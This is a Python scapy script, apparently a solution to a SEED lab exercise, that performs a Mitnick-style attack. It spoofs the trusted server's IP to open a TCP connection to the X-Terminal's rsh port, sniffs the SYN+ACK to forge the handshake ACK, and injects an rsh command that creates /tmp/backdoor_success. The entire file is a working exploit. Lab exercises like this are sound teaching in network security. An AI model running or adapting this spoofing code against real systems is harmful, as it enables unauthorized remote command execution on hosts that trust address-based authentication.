51 lines
1.8 KiB
Python
Executable File
51 lines
1.8 KiB
Python
Executable File
#!/usr/bin/python3
|
|
from scapy.all import *
|
|
import sys
|
|
|
|
# IP Addresses
|
|
X_IP = "10.9.0.5"
|
|
SRV_IP = "10.9.0.6"
|
|
|
|
# Ports
|
|
X_PORT = 514
|
|
SRV_PORT = 1023
|
|
SECOND_PORT = 9090
|
|
|
|
def mitnick_attack():
|
|
print(f"Starting Mitnick Attack on {X_IP}...")
|
|
|
|
# Step 1: Send spoofed SYN packet to X-Terminal
|
|
my_seq = 0x12345678
|
|
ip = IP(src=SRV_IP, dst=X_IP)
|
|
tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
|
|
print(f"Step 1: Sending spoofed SYN from {SRV_IP}:{SRV_PORT} to {X_IP}:{X_PORT}")
|
|
send(ip/tcp, verbose=0)
|
|
|
|
# Step 2 & 3: Sniff SYN+ACK and respond with ACK
|
|
def spoof_ack(pkt):
|
|
if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
|
|
print(f"Step 2: Received SYN+ACK from X-Terminal (Seq: {pkt[TCP].seq})")
|
|
|
|
# Respond with ACK
|
|
ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
|
TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
|
|
seq=my_seq + 1, ack=pkt[TCP].seq + 1)
|
|
print("Step 3: Sending spoofed ACK to complete handshake")
|
|
send(ack_pkt, verbose=0)
|
|
|
|
# Step 4: Send rsh data
|
|
data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/backdoor_success\x00"
|
|
rsh_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
|
TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
|
|
seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
|
|
print(f"Step 4: Sending rsh data: touch /tmp/backdoor_success")
|
|
send(rsh_pkt, verbose=0)
|
|
return True
|
|
return False
|
|
|
|
sniff(iface="br-63cae30f0395", filter=f"tcp and src host {X_IP} and dst port {SRV_PORT}",
|
|
prn=spoof_ack, count=1, timeout=5)
|
|
|
|
if __name__ == "__main__":
|
|
mitnick_attack()
|